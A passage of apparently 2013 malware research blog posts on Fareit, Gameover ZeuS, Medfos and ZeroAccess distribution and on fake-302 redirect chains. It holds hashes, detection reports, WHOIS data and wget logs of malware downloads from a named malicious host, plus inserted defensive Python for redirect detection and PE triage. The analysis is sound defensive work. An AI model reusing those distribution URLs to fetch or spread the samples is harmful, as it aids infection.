URL: https://www.virustotal.com/en/file/87470e30daee6c01abc7c6f5411356dad1350db215b856e69d78cd728bc28458/analysis/1378712207/
SHA256: 87470e30daee6c01abc7c6f5411356dad1350db215b856e69d78cd728bc28458
SHA1: 1c6780add9bfda83bafbfa349ddc91d4eb709a51
MD5: 117efa2ab14ef1623b7889a4bb9100e3
File size: 113.0 KB ( 115712 bytes )
File name: sample
File type: Win32 EXE
Tags: peexe
Detection ratio: 11 / 47
Analysis date: 2013-09-09 07:36:47 UTC ( 11 minutes ago )

BitDefender Gen:Variant.Zusy.60090
Comodo Heur.Packed.Unknown
Emsisoft Gen:Variant.Zusy.60090 (B)
F-Secure Gen:Variant.Zusy.60090
Fortinet W32/Kryptik.BDPK!tr
GData Gen:Variant.Zusy.60090
Malwarebytes Trojan.FavLock
McAfee BackDoor-FBFW!117EFA2AB14E
McAfee-GW-Ed. Heuristic.LooksLike.Win32.Suspicious.B
eScan Gen:Variant.Zusy.60090
Symantec Suspicious.Cloud.5
↑None of the results says Fareit... You can see more details of this trojan in my previous posts-->HERE and HERE.

Below is the PoC in PCAP about the downloaded and posted URLs:

Second payloads: Gameover & Medfos..

These are the second level payloads:

So what are these payloads?
There are two types of secondary payloads there: the ones with the blue icon are a peer-to-peer ZeuS variant, Gameover, and the one with the exclamation icon is Win32/Medfos. I uploaded them both to Virus Total, as per the reports below:

Trojan Zeus P2P Variant/Gameover -->LINK

URL: https://www.virustotal.com/en/file/be256dc175599524fa65bcf7263de3065658a86ee21184b59671a3c0fd9b05f1/analysis/1378716742/
SHA256: be256dc175599524fa65bcf7263de3065658a86ee21184b59671a3c0fd9b05f1
SHA1: 22f2bd96982e479236d81dc0487ab755b57f26c7
MD5: acab07b3eb59a7b2e9ee66f1eef7e761
File size: 297.0 KB ( 304128 bytes )
File name: edebk.exe
File type: Win32 EXE
Detection ratio: 6 / 46
Analysis date: 2013-09-09 08:52:22 UTC ( 0 minutes ago )

Fortinet W32/Kryptik.BDPK!tr
Malwarebytes Trojan.FavLock
McAfee FakeSecTool-FAZ!ACAB07B3EB59
McAfee-GW-Edition Heuristic.LooksLike.Win32.Suspicious.B
Symantec Suspicious.Cloud.5
VIPRE Trojan.Win32.Winwebsec.ia (v)
↑and none of the above mentions ZeuS/Gameover. Below is the P2P PoC:

Trojan downloader Win32/Medfos: -->LINK

URL: https://www.virustotal.com/en/file/5baf297dc80f807182b46b189e9df87d5397f728ba93758ac68ece59355cfdba/analysis/1378717111/
SHA256: 5baf297dc80f807182b46b189e9df87d5397f728ba93758ac68ece59355cfdba
SHA1: 13bc3d1c1a24e4e0c4753d0bd83c10c783609614
MD5: d9a50ae2c4bed7a59d8bed0c1320a068
File size: 210.5 KB ( 215552 bytes )
File name: ucUMruv.exe
File type: Win32 EXE
Detection ratio: 6 / 47
Analysis date: 2013-09-09 08:18:58 UTC ( 39 minutes ago )

ByteHero Trojan.Malware.Obscu.Gen.002
Comodo MalCrypt.Indus!
Fortinet W32/Medfos.IOE
Malwarebytes Trojan.Medfos.RRE
Norman Medfos.JMP
VBA32 SScope.Trojan.Midhos.2513
↑Four of the six products do a good job detecting this Win32/Medfos Trojan Downloader.

The mystery of the third-level payload

Medfos tries to fetch the third-level payload from some URLs, e.g.:
Host: www.01net.com
Method: HTTP/1.1 GET
URL: GET /uploading/id=1083243553&u=4WSbvjA+sJYdbjvNmxr6tWHxLtArmTtrSHvRwRLcacviRtnYIg2xc6QMAWYaZM4RqxalcusDRHEPVjzpf+v2xg==
Too bad (which is good news indeed!), the file was removed↓

Samples

As always, a share for research purposes and for raising the detection ratio:

Please mention to @malwaremustdie for password.

Hall of Fame

I thank my friends who stick together in the course we are taking. Thank you ‏@Malwageddon for the solid teamwork, @markusg for the advice & hints, @DhiaLite for introducing us to a new good useful tool, @ConradLongmore for the quick reference so I could confirm the findings, and all OP-kelihos team members.. you guys rock! To @sempersecurus for the great patience, and all #MalwareMustDie team & friends for standing side by side in battling malware together. To Umbrella Security Graph for the chance to use the good tool, link-->HERE

Comments:

In the end, this malicious campaign using the political situation itself is already bad enough; we think of it as an unusual scheme, judging by the well-made spam template.. all payloads have a very low detection ratio.. the Medfos backends for the third infection layer come from a file uploader service.. and it stings us in the short term of the event.
We hope that the US and Russia political heat will cool down soon. The more the heat rises, the more similar news/events come with worse chances of malware infection that those scums will use to hit our innocent victims..

#MalwareMustDie!

302-Redirector - A (new?) "Cushion Attack", an Attempt to Evade IDS/IPS Signature

This is a quick post about a current, ongoing web-driven malicious traffic redirection threat with a high possibility of malware infection. I was supervising some surveillance operations for one and a half months straight, so I may not know the recent progress or whether other researchers have already covered this, but since many links for this threat are rising now, I dare myself to peel and expose this threat for awareness purposes. For the IDS/IPS industry this is a must-read, for I am sure there is no coincidence regarding this new phenomenon in web threats.

It all started from an "Angel" (thank you so much!) who hinted me with a bunch of interesting URLs:

Since there is a possibility that the hash will change, it can practically be described with the regex below:

To confirm the regex above and its results, you can check it out in URLQuery (with thanks, friends; I can't research this well without your site!) in-->HERE

Looking at the URL status, some of them are already cleaned up (which is VERY GOOD), so I went to the "difficult to cure" sites to check the origin and nature of the threat, and found the "alive" redirection base using a fake HTTP 302 error page, as I captured below:

If we go all the way along the list (where the sites are alive), all we will see is the same fake 302 page redirecting via its own link; deeper investigation confirmed to me that these are URL redirectors that fire under what looks like an exact given condition.
The challenge came when tracing them one by one... here we go:

Threat Explanation

If you look in the picture at the one whose end page is kee.php, that is a CookieBomb threat, which can be set to go anywhere; you can see our previous post on CookieBomb-->HERE, so kindly bear with me for not explaining it further here.

One of the URLs made me bump straight into the RedKit URL:

One link I traced activates the "like" script of a Facebook account implanted in an RBN domain, a highly suspicious domain:

With the script linked to the PNG Facebook icon downloaded below:

One request I followed redirected me into a TDS scheme that forwarded me on and on until I ended up at a Ukrainian "hosting service" site (to make it short, I cut some of the HTTP conversation):

And so on..

What are these? What's the purpose?

It is not easy to explain this threat. I checked around 60-70 URLs just now and came to the conclusion that these are a cushion used to evade web filtering and URL-based IDS/IPS alerts for the web-driven attacks that the bad actors behind it have designed to follow. By suspending the redirection at the URL written in the fake 302 page, a response from the victim, clicking the link to continue the flow of redirection/infection to the next hop of the threat's site/URL, is required.

This new layer made by these 302 redirections adds a link to the threat chain; that is why I call it a new "cushion" for the further threats that come along behind it. I made a simple graph for better understanding below:
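A defender-side heuristic for the cushion described above: the pseudo-302 notice is an ordinary page with a click-to-continue link, so there is no Location header for a redirect signature to match. This is an added example, not the team's PoC code; the status code of the fake page, the notice markup and the three responses are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

STATUS_RE = re.compile(r"^HTTP/\d\.\d (\d{3})")
# Titles that imitate a server redirect notice (assumed wording, Apache-style).
NOTICE_RE = re.compile(r"<title>\s*(30[1237]\b|object moved|moved)", re.I)
HREF_RE = re.compile(r'href="(https?://[^"]+)"', re.I)


def split_response(raw: str):
    """Split a raw HTTP response into (status code, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    m = STATUS_RE.match(lines[0])
    status = int(m.group(1)) if m else 0
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return status, headers, body


def classify(raw: str, served_host: str) -> str:
    """served_host is the compromised site that answered; a link leaving it is a hop."""
    status, headers, body = split_response(raw)
    if 300 <= status < 400 and "location" in headers:
        return "real-redirect"            # browser follows it; Location is visible to IDS
    hops = [u for u in HREF_RE.findall(body)
            if (urlsplit(u).hostname or served_host) != served_host]
    if NOTICE_RE.search(body) and hops:
        return "fake-302-cushion"         # redirect notice that waits for a click
    if 300 <= status < 400:
        return "redirect-without-location"
    return "plain"


# Constructed responses (not captures from the post): a genuine 302, the
# look-alike notice served as a 200 page, and an ordinary page with its own link.
REAL_302 = "HTTP/1.1 302 Found\r\nLocation: http://next-hop.invalid/path\r\n\r\n"
FAKE_302 = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
            "<html><head><title>302 Found</title></head><body><h1>Found</h1>"
            '<p>The document has moved <a href="http://next-hop.invalid/path">here</a>.</p>'
            "</body></html>")
PLAIN = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
         "<html><head><title>Welcome</title></head><body>"
         '<a href="http://site.invalid/about">About</a></body></html>')


def scan(responses: dict, served_host: str = "site.invalid") -> dict:
    """Label every captured response; feed real captures here instead of the samples."""
    return {label: classify(raw, served_host) for label, raw in responses.items()}


if __name__ == "__main__":
    for label, verdict in scan({"real": REAL_302, "fake": FAKE_302, "plain": PLAIN}).items():
        print(f"{label:6s} -> {verdict}")
```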

Proof of Concept

I collected and posted some URLs myself for the investigation of this case, together with other researchers' posts, which (again) can be seen in the URLQuery page mentioned above. The screenshot is as follows:

If you look at the Alert column for IDS/IPS, it shows very low detection of these 302 pages; the evasion is working as expected by the scums who planned it. I call this threat "302-Redirectors" (as per what it is.. *smile*) for future reference.

Looking at the end-points of the redirection and infection that this threat can cause, I would not be surprised if the CookieBomb, RedKit and Kelihos people are behind this.

The Multiple Redirection Possibility

Speaking of the devil, the CookieBomb and TDS spread to infect Reveton that @kafeine (with many thanks for the post) mentioned in his blog-->HERE contains a video demonstration of the malicious tool used to mass-hack exploited sites, inject code and monitor the implemented TDS spread.

Since we know for sure that the 302-Redirectors (in short: 302redir) were created by the same actors behind CookieBomb (and also RedKit EK and Kelihos), and in that video, as proven in many CookieBomb-hacked sites, we can see that a conditional switch exists to make multiple URL redirections happen.

You can also see in the snapshot below, taken while the video was running, that two URLs for forwarding/redirection were burped out via a Jabber-based bot used in one thread of an injection scheme; it shows that multiple redirection logic exists behind the tools mentioned, pic (click to enlarge):

Proving the theory of multiple redirection is not so hard once we know how the usual threats of these types work. A member of our development/coder department made a very good PoC of the multiple forwarder used in the 302 Redirector threat, as per the capture below:

We are terribly sorry, we cannot release the whole PoC code for security reasons yet; we promise to release the code to known researchers only after the threat alert level becomes lower.

Samples

These are the samples that I received and analysed; you can view the URLs safely here-->HERE

Please be safe, friends. I hope this short awareness story helps.

#MalwareMustDie!

...And (again!) ZeroAccess/Sirefef is NOT Dead (yet!)

This is a straight-to-the-point post; for ZeroAccess reference, see the previous posts
in-->HERE and-->HERE. Please bear with me, for I will not repeat the previously exposed details.

Background

Again, do not believe what you read without checking, like this AV marketing issue-->HERE
The post has no technical analysis background specific to the threat's sample as malicious PoC, nor does it share the hashes of the verdicted subject. Not to mention the "huge intolerable research term miss" of mistaking ZeroKit (a root/bootkit) for ZeroAccess..=sigh=
I wrote the above statement as productive criticism, to demand an improvement and a fix of the current technical quality assurance of a technical post coming from a "reliable" "big brand" in the security industry that many people count on, trust and generously pay, on a yearly basis, for its licenses.
Additionally, in the country where I live and grew up, if such a vendor or maker made such a mistake, there would be a press conference to make a public apology and restore the trust of the market, which in this case the appointed security maker has not done. If it were my company, the person in charge of that erroneous "technical white paper" would be fired for sure!

This post is a PoC to counter the statement that "ZeroAccess was 50% neutralized" from the same maker mentioned above. It is actually a lesson to all of us to be more critical of such statements, especially from one who has not publicly announced its blocking list, samples of what had been blocked, and so on. What we found shows that ZeroAccess is out there, active in distribution with the same volume of P2P peers and domains, and improving its malicious act by using accompanying trojans. My question is simple: "What had been blocked???" You all have the right to judge it yourself after reading the details below.

Just when I hoped to find an alive PoC of ZeroAccess (or Sirefef), our crusader friend found it first and mentioned it: VERY ALIVE:

Wasting no time, I dived deep and was surprised by what I found.


The Infection Source

The IP 158.255.6 .116 is actively distributing ZeroAccess among other threats. The URLQuery report is-->HERE. Below is VirusTotal's passive DNS report for the IP address, link is--->HERE

List of the downloaded URLs:
Strong verdicts on the hashes:
OpenDNS also recorded infection requests to the domains below:
It is all served at HOSTKEY.RU:
inetnum:        158.255.0.0 - 158.255.7.255
netname: RU-HOSTKEY-20111114
descr: Mir Telematiki Ltd
country: RU
org: ORG-MTL21-RIPE
admin-c: PC7356-RIPE
tech-c: PC7356-RIPE
tech-c: PC7356-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: MTLM-MNT
mnt-routes: MTLM-MNT
remarks: abuse-mailbox: abuse@hostkey.com
source: RIPE # Filtered

organisation: ORG-MTL21-RIPE
org-name: Mir Telematiki Ltd
org-type: LIR
address: Mir Telematiki Ltd Petr Chayanov Lva Tolstogo, 19/2 119021 Moscow RUSSIAN FEDERATION
phone: +74992463587
fax-no: +74992463587
mnt-ref: MTLM-MNT
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
abuse-mailbox: abuse@hostkey.ru
abuse-c: HA2800-RIPE
source: RIPE # Filtered

person: Peter Chayanov
address: Moscow, Russia
phone: +7 499 246 3587
nic-hdl: PC7356-RIPE
mnt-by: MTLM-MNT
abuse-mailbox: abuse@hostkey.ru
source: RIPE # Filtered
The same actors control these domains; this is not a hacked site:
Domain ID:D48479867-LRMS
Domain Name:ARTISANENT.INFO
Created On:24-Nov-2012 12:27:33 UTC
Last Updated On:24-May-2013 12:39:48 UTC
Expiration Date:24-Nov-2013 12:27:33 UTC
Sponsoring Registrar:GoDaddy.com, LLC (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Registrant ID:CR143925388
Registrant Name:wu liao
Registrant Organization:
Registrant Street1:xinyierbai 1-203
Registrant Street2:
Registrant Street3:
Registrant City:beijing
Registrant State/Province:beijing
Registrant Postal Code:10000
Registrant Country:CN
Registrant Phone:+86.13564859684
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:wuliaijod20d13@hotmail.com
Name Server:NS71.DOMAINCONTROL.COM
Name Server:NS72.DOMAINCONTROL.COM


The Verdict

Downloaded PoC:

--2013-10-07 15:29:00--  h00p://gtrfeds.artisanent.info/m.exe
Resolving gtrfeds.artisanent.info... 158.255.6.116
Connecting to gtrfeds.artisanent.info|158.255.6.116|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 211968 (207K) [application/x-msdownload]
Saving to: `m.exe'
100%[=================================>] 211,968 110K/s in 1.9s
2013-10-07 15:29:03 (110 KB/s) - `m.exe' saved [211968/211968]


--2013-10-07 15:29:12-- h00p://gtrfeds.artisanent.info/zs.exe
Resolving gtrfeds.artisanent.info... 158.255.6.116
Connecting to gtrfeds.artisanent.info|158.255.6.116|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 52736 (52K) [application/x-msdownload]
Saving to: `zs.exe'
100%[=================================>] 52,736 56.4K/s in 0.9s
2013-10-07 15:29:14 (56.4 KB/s) - `zs.exe' saved [52736/52736]
These are the samples:
2013/10/01  00:58  211,968 m.exe 8df1f6f7cf864df50f02cbab508564b0
2013/09/30 00:58 52,736 zs.exe 872031e4b8f8abfcadecb754a4f383a2
And the evidence of my download:


In VirusTotal the report shows:

   URL: https://www.virustotal.com/en/file/9dcbb64f365fdf6f80607d297d88134efa4a74ebadc3cc3c5effa9c4f8625937/analysis/
SHA256: 9dcbb64f365fdf6f80607d297d88134efa4a74ebadc3cc3c5effa9c4f8625937
SHA1: d015651dbaeb2a43dd70731af2ab0c7a5ddd9086
MD5: 8df1f6f7cf864df50f02cbab508564b0
File size: 207.0 KB ( 211968 bytes )
File name: m.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 29 / 45
Analysis date: 2013-10-03 05:47:16 UTC ( 4 days, 1 hour ago )
---------------------------------------------------------------------
Antivirus Result Update
---------------------------------------------------------------------
Bkav HW32.CDB.5ccc 20131002
MicroWorld-eScan Trojan.Generic.9635821 20131003
McAfee ZeroAccess-FBJ!8DF1F6F7CF86 20131003
Malwarebytes Rootkit.0Access.RC 20131003
K7AntiVirus Riskware 20131002
K7GW Riskware 20131002
Norman ZAccess.BHJZ 20131002
TrendMicro-HouseCall TROJ_GEN.F0C2C00J213 20131003
Avast Win32:Malware-gen 20131003
Kaspersky Backdoor.Win32.ZAccess.ecid 20131003
BitDefender Trojan.Generic.9635821 20131003
SUPERAntiSpyware Trojan.Agent/Gen-ZAccess 20131003
Sophos Mal/ZAccess-BL 20131003
Comodo UnclassifiedMalware 20131003
F-Secure Trojan.Generic.9635821 20131003
AntiVir TR/Rogue.9635412 20131002
TrendMicro TROJ_GEN.F0C2C00J213 20131003
McAfee-GW-Edition Artemis!8DF1F6F7CF86 20131003
Emsisoft Trojan.Generic.9635821 (B) 20131003
Antiy-AVL Backdoor/Win32.ZAccess.gen 20131003
Kingsoft Win32.Troj.Generic.a.(kcloud) 20130829
Microsoft TrojanDropper:Win32/Sirefef 20131003
AhnLab-V3 Backdoor/Win32.ZAccess 20131002
GData Trojan.Generic.9635821 20131003
ESET-NOD32 Win32/Sirefef.FY 20131002
Ikarus Trojan.Crypt2 20131003
Fortinet W32/ZAccess.AX!tr 20131003
AVG Crypt2.BJIS 20131002
Panda Trj/Genetic.gen 20131002
and...
   URL: https://www.virustotal.com/en/file/8b807576a649a8a6c00ce8b4c655a050ac791ce0dfe1d99fae0d6e4467e069c1/analysis/
SHA256: 8b807576a649a8a6c00ce8b4c655a050ac791ce0dfe1d99fae0d6e4467e069c1
SHA1: a4b84fb5f160bc68ce6f6200c2aba05648909ec4
MD5: 872031e4b8f8abfcadecb754a4f383a2
File size: 51.5 KB ( 52736 bytes )
File name: zs.exe
File type: Win32 EXE
Tags: peexe aspack
Detection ratio: 32 / 48
Analysis date: 2013-10-07 05:42:45 UTC ( 1 hour, 56 minutes ago )

--------------------------------------------------------------------------------
Antivirus Result Update
--------------------------------------------------------------------------------

Bkav HW32.CDB.70c0 20131005
MicroWorld-eScan Gen:Variant.Graftor.116502 20131007
McAfee RDN/Generic Downloader.x!in 20131007
Malwarebytes Trojan.Delf.UKN 20131007
K7AntiVirus Trojan 20131004
K7GW Trojan 20131004
Symantec WS.Reputation.1 20131007
Norman Troj_Generic.QBBRJ 20131007
TrendMicro-HouseCall TROJ_DLOADE.FCX 20131007
Avast Win32:Malware-gen 20131007
Kaspersky Trojan-Downloader.Win32.Delf.bbcn 20131007
BitDefender Gen:Variant.Graftor.116502 20131007
Agnitum Trojan.DL.Delf!1XVARP0nySk 20131006
Emsisoft Gen:Variant.Graftor.116502 (B) 20131007
Comodo UnclassifiedMalware 20131007
F-Secure Gen:Variant.Graftor.116502 20131007
VIPRE Trojan.Win32.Generic!BT 20131007
AntiVir TR/Graftor.116502 20131007
TrendMicro TROJ_DLOADE.FCX 20131007
McAfee-GW-Edition Heuristic.BehavesLike.Win32.Suspicious-PKR.G 20131006
Sophos Mal/Generic-S 20131007
Panda Trj/CI.A 20131006
Kingsoft Win32.TrojDownloader.Delf.bb.(kcloud) 20130829
Microsoft Trojan:Win32/Orsam!rts 20131007
AhnLab-V3 Downloader/Win32.Delf 20131006
GData Gen:Variant.Graftor.116502 20131007
VBA32 suspected of Trojan.Downloader.gen.h 20131005
ESET-NOD32 a variant of Win32/TrojanDownloader.Delf.RWG 20131007
Ikarus Win32.SuspectCrc 20131007
Fortinet W32/Delf.RWG!tr.dldr 20131007
AVG Downloader.Generic13.BNCS 20131006
Baidu-International Trojan.Win32.Downloader.Delf.RWG 20131006

Payload Details

m.exe


Info:
================================================================================
File Name: m.exe
File Size: 211968 byte
Compile Time: 2005-03-30 03:17:14 <=== faked
DLL: False
Sections: 4
MD5 hash: 8df1f6f7cf864df50f02cbab508564b0
SHA-1 hash: d015651dbaeb2a43dd70731af2ab0c7a5ddd9086
Anti Debug: Yes
Anti VM: None
--------------------------------------------------------------------------------
Size: 211968 bytes
Type: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: 8df1f6f7cf864df50f02cbab508564b0
SHA1: d015651dbaeb2a43dd70731af2ab0c7a5ddd9086
Date: 0x42499BAA [Tue Mar 29 18:17:14 2005 UTC] <== faked, set by the builder..
EP: 0x404c0c .text 0/4 [SUSPICIOUS]
CRC: Claimed: 0x33fe1, Actual: 0x33fe1
--------------------------------------------------------------------------------

Sections:
================================================================================
Name VirtAddr VirtSize RawSize Entropy
--------------------------------------------------------------------------------
.text 0x1000 0x718c 0x7200 4.942657
.rsrc 0x9000 0x29ca4 0x29e00 6.244711
.reloc 0x33000 0x244 0x400 1.173713
.rdata 0x34000 0x2228 0x2400 5.573327

File and URL:
================================================================================
FILE: kernel32.dll
FILE: user32.dll
FILE: d3d8thk.dll
FILE: kernel32.dll
FILE: user32.dll
FILE: KERNEL32.DLL
FILE: OPENGL32.dll
FILE: advapi32.dll
FILE: d3d8.dll
FILE: d3d8thk.dll
FILE: reity.exe
URL: None

Suspicious API Functions:
================================================================================
Func. Name: OpenFileMappingA
Func. Name: GetModuleHandleA
Func. Name: FindResourceExA
Func. Name: GetModuleFileNameA
Func. Name: GetComputerNameA
Func. Name: VirtualAllocEx <=====
Func. Name: VirtualAllocEx <=====
Func. Name: GetTempPathA
Func. Name: GetModuleFileNameA
Func. Name: IsDebuggerPresent
Func. Name: FindResourceExW
Func. Name: GetVersionExA
Func. Name: GetFileAttributesExA
Func. Name: GetFileAttributesExA
Func. Name: SetWindowsHookExA
Func. Name: GetProcAddress
Func. Name: FindResourceA
Func. Name: ConnectNamedPipe
Func. Name: FindFirstFileA
Func. Name: VirtualProtectEx
Func. Name: GetFileAttributesA
Func. Name: GetComputerNameA

Suspicious API Anti-Debug:
Anti Debug: IsDebuggerPresent

Version info
================================================================================
LegalCopyright: Voleter it(c) \xa9 2012
InternalName: ejbnisgj
FileVersion: a 2 RC87.44060017.189e
CompanyName: Voleter it(c)
ProductName: Voleter it(c)
ProductVersion: 122.19153 RelC
FileDescription: Voleter it(c)
OriginalFilename: ejbnisgj.exe
Translation: 0x0409 0x04b0
I won't write much in great detail here; please refer to my previous analysis-->HERE for the binary part, which tells us a lot. Please see the correct statement in the VirusTotal behaviour analysis here-->HERE, and the VT summary is below:

The usage of GeoIP: the attempt to download it from the MaxMind site and the UDP communication show the usual pattern of ZA.
Again, please refer to this-->HERE for the details.

PoC of ZeroAccess Botnet is up and alive

ZeroAccess network:

When I ran it.. below is the DNS communication; I gave ZA all they want to access the botnet (if there is a botnet still up..)

Honestly, why did I not see ANY downtime of this ZeroAccess peer communication?
No hiccups or slowdown in this communication at all, so what really was shut down??
Later on, in the PCAP sample, you can count yourself how fast the rotation of peer access was called; this is just the usual speed I saw in previous analyses of ZeroAccess, nothing changed (sadly..)

The ZeroAccess "accompanied" Trojan "A" - downloader: zs.exe

Binary info:

File:    ./zs.exe
Size: 52736 bytes
Type: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: 872031e4b8f8abfcadecb754a4f383a2
SHA1: a4b84fb5f160bc68ce6f6200c2aba05648909ec4
Date: 0x5247BBB7 [Sun Sep 29 05:33:43 2013 UTC]
EP: 0x42e001 .DB 10/12 [SUSPICIOUS]
CRC: Claimed: 0x0, Actual: 0x1a3f8 [SUSPICIOUS]
--------------------------------------------------------------------------------
Packer:
ASProtect V2.X DLL -> Alexey Solodovnikov - additionalASProtect V2.X DLL -> Alexey Solodovnikov
ASPack v2.12 - additionalASPack v2.12
ASPack v2.1 - additional
--------------------------------------------------------------------------------
File Name: zs.exe
File Size: 52736 byte
Compile Time: 2013-09-29 14:33:43
DLL: False
Sections: 12
MD5 hash: 872031e4b8f8abfcadecb754a4f383a2
SHA-1 hash: a4b84fb5f160bc68ce6f6200c2aba05648909ec4
Anti Debug: None
Anti VM: None
---------------------------------------------------------------------------------
Entry Point at 0xbc01
Virtual Address is 0x42e001


Resource entries
================================================================================
Name RVA Size Lang Sublang Type
--------------------------------------------------------------------------------
RT_STRING 0x2c218 0x74 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_STRING 0x2c28c 0x298 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_STRING 0x2c524 0xd4 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_STRING 0x2c5f8 0xa4 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_STRING 0x2c69c 0x29c LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_STRING 0x2c938 0x368 LANG_NEUTRAL SUBLANG_NEUTRAL empty
RT_STRING 0x2cca0 0x288 LANG_NEUTRAL SUBLANG_NEUTRAL empty
RT_RCDATA 0x2cf28 0x10 LANG_NEUTRAL SUBLANG_NEUTRAL empty
RT_RCDATA 0x2cf38 0x128 LANG_NEUTRAL SUBLANG_NEUTRAL empty

Sections
================================================================================
Name VirtAddr VirtSize RawSize Entropy
--------------------------------------------------------------------------------
.text 0x1000 0x1c000 0x9800 7.985545 [SUSPICIOUS]
.itext 0x1d000 0x1000 0x400 6.023927
.data 0x1e000 0x2000 0xa00 7.169703 [SUSPICIOUS]
.bss 0x20000 0x5000 0x0 0.000000 [SUSPICIOUS]
.idata 0x25000 0x1000 0x600 6.466433
.didata 0x26000 0x1000 0x200 2.176323
.tls 0x27000 0x1000 0x0 0.000000 [SUSPICIOUS]
.rdata 0x28000 0x1000 0x200 0.210826 [SUSPICIOUS]
.reloc 0x29000 0x3000 0x0 0.000000 [SUSPICIOUS]
.rsrc 0x2c000 0x2000 0x800 6.544777
.DB 0x2e000 0x2000 0x1200 5.804077
.adata 0x30000 0x1000 0x0 0.000000 [SUSPICIOUS]
--------------------------------------------------------------------------------
File and URL:
FILE: kernel32.dll
FILE: user32.dll
FILE: kernel32.dll
FILE: oleaut32.dll
FILE: advapi32.dll
FILE: user32.dll
FILE: user32.dll
URL: None
--------------------------------------------------------------------------------
Suspicious API Functions:
Func. Name: GetProcAddress
Func. Name: GetModuleHandleA
Func. Name: LoadLibraryA
Func. Name: LoadLibraryA
--------------------------------------------------------------------------------
Suspicious Sections:
Sect. Name: .text^@^@^@
MD5 hash: 607a461cb659e5a10b566434de7fa3d3
SHA-1 hash: b1bf940acbcb37877a5513d7385765d1937a0ea1
Sect. Name: .data^@^@^@
MD5 hash: 46564b11f19cb7c4fd0da8e27fd4f394
SHA-1 hash: 03f78fc221ae145c9311ef0bfd98b0d6e3acd793
Sect. Name: .bss^@^@^@^@
MD5 hash: d41d8cd98f00b204e9800998ecf8427e
SHA-1 hash: da39a3ee5e6b4b0d3255bfef95601890afd80709
Sect. Name: .tls^@^@^@^@
MD5 hash: d41d8cd98f00b204e9800998ecf8427e
SHA-1 hash: da39a3ee5e6b4b0d3255bfef95601890afd80709
Sect. Name: .rdata^@^@
MD5 hash: 3dbb241e3190fbd14c8a44da3a00e61b
SHA-1 hash: 8247038ba6b52fb73328ca11fe47df8633ced36f
Sect. Name: .reloc^@^@
MD5 hash: d41d8cd98f00b204e9800998ecf8427e
SHA-1 hash: da39a3ee5e6b4b0d3255bfef95601890afd80709
Sect. Name: .adata^@^@
MD5 hash: d41d8cd98f00b204e9800998ecf8427e
SHA-1 hash: da39a3ee5e6b4b0d3255bfef95601890afd80709
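Two of the flags in the scanner output above are cheap to reproduce yourself: a claimed PE checksum that does not match the recomputed one (zs.exe claims 0x0), and sections whose entropy is near 8.0 (packed, as in the ASPack .text) or exactly 0.0 (no raw data). The script below is an added example, not the scanner used for the post; it builds a constructed minimal PE32 in memory, and the 7.0 entropy threshold is an assumption.

```python
import math
import struct
from typing import List, Tuple

ENTROPY_HIGH = 7.0  # assumed threshold: packed/encrypted data sits close to 8.0 bits/byte


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for an all-zero or empty section, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c) or 0.0


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Recompute the optional-header CheckSum the way CheckSumMappedFile does:
    fold 32-bit words into 16 bits, skipping the CheckSum field itself, then
    add the file length.  A claimed value of 0 therefore never matches."""
    padded = data + b"\0" * (-len(data) % 4)
    skip = checksum_offset // 4
    total = 0
    for i in range(len(padded) // 4):
        if i == skip:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data: bytes) -> Tuple[int, int, List[Tuple[str, bytes]]]:
    """Return (claimed checksum, file offset of the CheckSum field, [(section, raw bytes)])."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    ck_off = opt + 64                                     # same offset for PE32 and PE32+
    claimed = struct.unpack_from("<I", data, ck_off)[0]
    sections = []
    for i in range(nsect):
        hdr = opt + opt_size + i * 40
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", data, hdr + 16)
        sections.append((name, data[raw_ptr:raw_ptr + raw_size]))
    return claimed, ck_off, sections


def triage(data: bytes) -> List[str]:
    """Lines in the style of the scanner output above, with the same two flags."""
    claimed, ck_off, sections = parse_pe(data)
    actual = pe_checksum(data, ck_off)
    flag = "" if claimed == actual else " [SUSPICIOUS]"
    lines = [f"CRC: Claimed: {claimed:#x}, Actual: {actual:#x}{flag}"]
    for name, raw in sections:
        e = shannon_entropy(raw)
        flag = " [SUSPICIOUS]" if e > ENTROPY_HIGH or e == 0.0 else ""
        lines.append(f"{name} RawSize {len(raw):#x} Entropy {e:.6f}{flag}")
    return lines


def build_sample_pe(claimed_checksum: int, sections: List[Tuple[bytes, bytes]]) -> bytes:
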